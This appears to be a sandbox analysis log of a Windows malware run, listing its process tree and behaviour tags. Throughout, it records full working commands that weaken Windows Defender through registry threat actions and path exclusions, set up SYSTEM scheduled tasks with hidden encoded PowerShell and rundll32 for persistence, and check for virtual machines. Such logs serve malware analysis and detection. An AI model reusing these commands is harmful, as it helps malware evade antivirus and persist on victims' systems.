C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3968 -ip 39681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5220 -ip 52201⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\GfTHlTq.exeC:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\GfTHlTq.exe ZO /oosite_idxCi 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJLDvKxDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJLDvKxDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jDcnSjPvYahU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jDcnSjPvYahU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qpZxqHvFKXpRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qpZxqHvFKXpRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vGrfpbVBjyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vGrfpbVBjyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mMAjWdbxOIjSziVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mMAjWdbxOIjSziVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\heXdjphsLYtTYYrU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\heXdjphsLYtTYYrU\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mMAjWdbxOIjSziVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mMAjWdbxOIjSziVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\heXdjphsLYtTYYrU /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\heXdjphsLYtTYYrU /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYShRuJwc" /SC once /ST 09:00:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYShRuJwc"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYShRuJwc"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qXnxKrbPbFSTFetyh" /SC once /ST 04:01:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\UIQRhsq.exe\" ob /Pdsite_idwVA 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "qXnxKrbPbFSTFetyh"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5220 -ip 52201⤵
-
C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\UIQRhsq.exeC:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\UIQRhsq.exe ob /Pdsite_idwVA 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bwrroZoeZRoQVpyAcj"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OJLDvKxDU\UVxKpc.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ZPVskaMeORyUtyn" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZPVskaMeORyUtyn2" /F /xml "C:\Program Files (x86)\OJLDvKxDU\zKZMLhZ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ZPVskaMeORyUtyn"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZPVskaMeORyUtyn"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yrjCurKJXOthHv" /F /xml "C:\Program Files (x86)\jDcnSjPvYahU2\WYgrUhi.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
